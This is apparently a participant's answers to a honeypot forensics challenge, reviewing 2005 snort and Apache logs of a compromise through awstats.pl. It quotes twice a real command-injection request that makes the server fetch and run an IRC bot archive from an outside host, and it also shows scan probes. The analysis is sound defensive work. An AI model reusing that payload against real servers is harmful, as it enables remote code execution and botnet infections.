here go the answers: 1. the honeypot was compromised and the IRC bot installed on it. I would say compared to this, all the other SSH probes, etc. were quite unserious. There was also an unsuccessful exploit attempt later on, and a couple or more successful ones. I've used my own utility mugrep (http://stdio.be/mugrep/) - which I slightly enhanced for this occasion - adding the negative switches. The idea is that you start with the full log and gradually cut off the parts that give the noise. cat snortsyslog | ~/tmp/mugrep '^nonlocal sour!^IIS!^CodeRed!^EVAS!^MS-SQL!^Closed dest por!^ICMP!snort' | less was something that gave the initial browsing experience. Then by seeing the suspicious wget download attempt - indeed in the error log of http server there was the downloaded irc bot: access_log.3:213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zxf%20aw.tgz%3b%20rm%20-f%20aw.tgz%3b%20cd%20.aw%3b%20.%2finetd%20%7c%20 HTTP/1.1" 200 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" and subsequently progress of wget. The logs of the snort are full of IRC junk later on. There are also connection to a different IRC server later on - I did not trace this too thoroughly, there were a couple more of connections with the useragent "FunWebProducts". 2. The system was indeed compromised - the most compelling evidence is the presence of the IRC bot installed. I would say it was a single attacker - seems like the second attempt has exactly the same pattern - very similar attempts from two different addresses with very small interval. 3. The most evidence of the compromise would be the wget in stderr of the webserver, and subsequent IRC logs. 4. At the same time there was a background noise of trying various IIS-related exploits, ssh probes, attempts to login, tries to probe for a mysql server. the interesting thing for me was the amount of scans specific to mysql and linux in general. 5. The time was obviously off by few hours: in the snort log: Feb 26 19:00:40 bastion snort: [1:2001686:6] BLEEDING-EDGE EXPLOIT Awstats Remote Code Execution Attempt [Classification: Web Application Attack] [Priorit y: 1]: {TCP} 213.135.2.227:50860 -> 11.11.79.89:80 in the apache log: access_log.3:213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zxf%20aw.tgz%3b%20rm%20-f%20aw.tgz%3b%20cd%20.aw%3b%20.%2finetd%20%7c%20 HTTP/1.1" 200 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" Interesting that this record appears three minutes after this one: access_log.3:213.135.2.227 - - [26/Feb/2005:14:10:36 -0500] "GET /cgi-bin/awstats.pl HTTP/1.0" 200 760 "-" "-" whic means that the miscreant was probably doing the things manually. It seems like the awstats.pl exploit is quite popular these days - I've seen an attempt to use it in my logs as well - and considering that I haven't yet put my server into any search engine - it's been less than a week that I've register it in DNS and got the hosting IP -> the miscreants must be using some automatic scanning methodology. Here's the log from my system: 67.19.228.138 - - [15/Apr/2005:14:23:31 -0400] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 67.19.228.138 - - [15/Apr/2005:14:23:32 -0400] "GET /awstats/awstats.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" An odd observation is that a couple of the FunWeb attacks seemed to be coordinated - they were happening in one minute's interval and then there was long period of quietness. The unsuccessful guy seems to have spent some time figuring what is wrong - it seems like could be the GLIBC incompatibility with his malware. Thanks again for the opportunity to dig into this - it was truly fun. best regards, andrew